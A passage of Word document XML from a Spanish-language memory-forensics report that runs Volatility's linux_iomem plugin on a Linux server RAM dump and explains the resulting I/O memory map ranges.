j9qrCgNvMc7MW7QImB/HW2&#10;7Vj2LoR82Edvg2si64waraGzYZ214kQ4xP4Gt5RK1yKwYNfx4lHYiWfwFQ7QWSuhKGKvxUT6K3CJ&#10;Og67PNbJY8FzkVtLlNjy7PNMWBVYdL4YLuckXNj8VGJHzKYJy0cNvpB1qniLuQk5rAx/wZ7lxymc&#10;oLfmocxn5bEsUHXlKSUjH1nlKbkEh0zxwnC2X+TGwM5yaI/CDtYebTA2bA2+OLQNPx75Fgun+yB6&#10;6Ut465Mrt9GZI4QQQsy4B1TegrGK+/QL/s4Q0m+AFw/w3TuiOMQDQsoVWC++bB5KcjeJw07EOK1A&#10;mjE7MOpn9oC2FQ/+p79gva+qaPJ2KWD8VzdoBtmA+/sKVH+xQDKbBdCsDOLFmVymGEw35vohDZHR&#10;bSBS2rSEseQcPCKOVQzmSd3iXZHX4THccNDBLuZHuGZUvX+qhy/Hnq9VCG02C/stb9EqA92nnxBC&#10;SGVlQb94rinRIAX9Ckfo5neHzlUHLp0Fue7iXV8E8LtOwHprnvmbd5OdNzSLH4BRHHKQz6IR8T7i&#10;bkoIhRlQLz4LZV0/qVJhBePwNtAMdIMgPplUwp2NhPWnKSzGbuT1QxoYKxS1mYRMdxWUidvgFZ9W&#10;4QQ3qQscDB6PIN3XAZzSFVprJfgbR+F5PrJ8+FAlFPQTQgipS6agX2Ahv/hf2Zl+KwcYRjWHvpML&#10;jC5KoKQY3Ml4qH9OAX+LaxvvKFcP6MQn0jazAexZeTQl4OIyofwtDspr5mEsd4RaDcGbBfQOLIAW&#10;B02k5oPPYIE+1Q9pSJQtkdl9AIoUeXA88yOcxY4jqWMcdH5jkNbMg7UlJVDlXECTS6dhpbszHXIK&#10;+gkhhFTGBSm9BPG0XoWgnxBCCCGEENJg8FyFq9kIIYQQQgghDY3p7j2EEEIIIYSQhqvsTL94m0BC&#10;CCGEEEJIQwP8P2rkO5SF+kaNAAAAAElFTkSuQmCCUEsDBBQABgAIAAAAIQBtflOU4AAAAAkBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI9Ba8JAFITvhf6H5RV6000iUUnzIiJtT1KoFkpva/aZBLNvQ3ZN&#10;4r/v9lSPwwwz3+SbybRioN41lhHieQSCuLS64Qrh6/g2W4NwXrFWrWVCuJGDTfH4kKtM25E/aTj4&#10;SoQSdplCqL3vMildWZNRbm474uCdbW+UD7KvpO7VGMpNK5MoWkqjGg4LtepoV1N5OVwNwvuoxu0i&#10;fh32l/Pu9nNMP773MSE+P03bFxCeJv8fhj/8gA5FYDrZK2snWoRZHIIIyTJOQAR/nazClRNCukoX&#10;IItc3j8of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MW9TP&#10;mgMAADQIAAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQAx&#10;aVDk600BAOtNAQAUAAAAAAAAAAAAAAAAAAAGAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ1BLAQItABQA&#10;BgAIAAAAIQBtflOU4AAAAAkBAAAPAAAAAAAAAAAAAAAAAB1UAQBkcnMvZG93bnJldi54bWxQSwEC&#10;LQAUAAYACAAAACEAqiYOvrwAAAAhAQAAGQAAAAAAAAAAAAAAAAAqVQEAZHJzL19yZWxzL2Uyb0Rv&#10;Yy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAAdVgEAAAA=&#10;">
                <v:shape id="Imagen 30" o:spid="_x0000_s1109" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:32404;height:19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QszQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;EIXvQv/DMgUvxW4qpsTYbQmiIAYEW/E8ZMdsbHY33V2b6K93DoLHmXnz3vs2u8n24kwhdt4pWC0z&#10;EOQarzvXKng7PF4VIGJCp7H3jhR8U4TddnaxwVL70b3SeZ9awSYulqjApDSUUsbGkMW49AM5vn34&#10;YDHxGFqpA45sbnt5nWVrabFznGBwoHtDzXH/ZRUM9al+P5iX55tqrD4LfKgXi5+g1OV8qu5AJJrS&#10;v/jv+0lz/TxfrW+LvGAKZuIFyO0vAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABUlZCzN&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;">
                  <v:imagedata r:id="rId156" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1110" type="#_x0000_t202" style="position:absolute;left:34036;top:7556;width:18535;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oglzQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEhcEEu3dQWVZdM0gTS4TJRduFmN15Q1SZWkW/n38wGJo+3n9963XI+2E2cKsfVOwXSS&#10;gSBXe926RsHh6+3xGURM6DR23pGCX4qwXt3eLLHU/uI+6VylRrCJiyUqMCn1pZSxNmQxTnxPjm9H&#10;HywmHkMjdcALm9tOzrKskBZbxwkGe9oaqk/VYBXs8++9eRiOrx+bfB7eD8O2+Gkqpe7vxs0LiERj&#10;+hf/fe80139aZIsin8+Ygpl4AXJ1BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOMKiCXN&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="18AC210A" w14:textId="2A70620A" w:rsidR="00B651A7" w:rsidRPr="00D65430" w:rsidRDefault="00B651A7" w:rsidP="00B651A7">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>28</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="76" w:name="_Toc155782595"/>
                        <w:r>
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D7594B">
                          <w:t>linux_iomem.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="76"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, se procede a obtener información relativa a la memoria de entrada/salida (I/O) en un sistema Linux. para ello usaremos el comando </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_iomem</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Este comando es similar a la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iomem</w:t>
      </w:r>
      <w:r w:rsidR="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Linux, la cual proporciona información sobre el mapeo de la memoria de entrada/salida del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. El comando </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_iomem</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Volatility analiza un volcado de memoria de un sistema Linux y extrae información sobre cómo el kernel ha mapeado la memoria física para dispositivos de entrada/salida. Por lo anteriormente expuesto y ya realizado en las anteriores secciones, se colige que el comando a utilizar es </w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_iomem</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15004C6A" w14:textId="7EB006F7" w:rsidR="00EE7DF8" w:rsidRPr="00EE7DF8" w:rsidRDefault="00EE7DF8" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654282 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XI. Comando linux_iomem.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F596119" w14:textId="41E1F852" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un pequeño análisis explicativo de la respuesta del comando iomem es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC4D0C" w14:textId="699E362E" w:rsidR="00AA7FAD" w:rsidRPr="00674C49" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C49">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00674C49">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0x1000 - 0x9DFFF y 0x100000 - 0x3FFFFFFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C057C" w14:textId="039874C6" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas áreas representan la memoria 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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del sistema. La primera sección es una pequeña porción al inicio de la memoria, y la segunda es la parte principal de la memoria RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD187D" w14:textId="350D4D89" w:rsidR="00AA7FAD" w:rsidRPr="00674C49" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674C49">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reserved (0x9E000 - 0x9FFFF y 0xE0000 - 0xFFFFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A849C1" w14:textId="6A721C51" w:rsidR="00501C7A" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas son áreas de memoria reservadas, posiblemente por el BIOS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>BIOS: Basic Input/Output System, software que inicializa el hardware durante el arranque de un ordenador.</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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o por el sistema operativo para funciones específicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A1CB0" w14:textId="1C9B996E" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PCI Bus 0000:00 (0xA0000 - 0xBFFFF y 0xF0000000 - 0xFBFFFFFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481D8A5" w14:textId="77777777" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estas áreas están asignadas a los buses PCI del sistema, utilizadas para la comunicación con dispositivos de hardware conectados a través de estos buses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA2CC4" w14:textId="730842D0" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Video ROM (0xC0000 - 0xC8BFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70DEF2" w14:textId="0FABCD95" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esta es la memoria reservada para el ROM de la tarjeta de video, que contiene el firmware básico para la tarjeta gráfica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5720E0" w14:textId="4C4C5E22" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System ROM (0xF0000 - 0xFFFFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0831C6" w14:textId="167A13D1" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esta sección es para el ROM del sistema, donde reside el BIOS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>BIOS: Basic Input/Output System, software que inicializa el hardware durante el arranque de un ordenador.</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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o firmware básico de la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577D271" w14:textId="51C49164" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kernel code, data, and bss (0x31C00000 - 0x33516FFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6F659" w14:textId="74C5E203" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Estas áreas son específicas para el núcleo del sistema operativo, incluyendo el código del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, los datos y el segmento 'bss' (bloque de inicio sin asignar), que se utiliza para las variables globales no inicializadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA4CF08" w14:textId="3E41729B" w:rsidR="00AA7FAD" w:rsidRPr="007909C5" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007909C5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IOAPIC, HPET, Local APIC (0xFEC00000 - 0xFEE00FFF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF52EB3" w14:textId="5B746065" w:rsidR="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Estos son componentes de hardware relacionados con la gestión de interrupciones y temporizadores de alta precisión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BE71A" w14:textId="291BB6A5" w:rsidR="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="007909C5">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:t>Linux_dmesg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70626091" w14:textId="290C492A" w:rsidR="00EE7DF8" w:rsidRPr="00F674A8" w:rsidRDefault="00EE7DF8" w:rsidP="00EE7DF8">
      <w:pPr>
        <w:rPr>
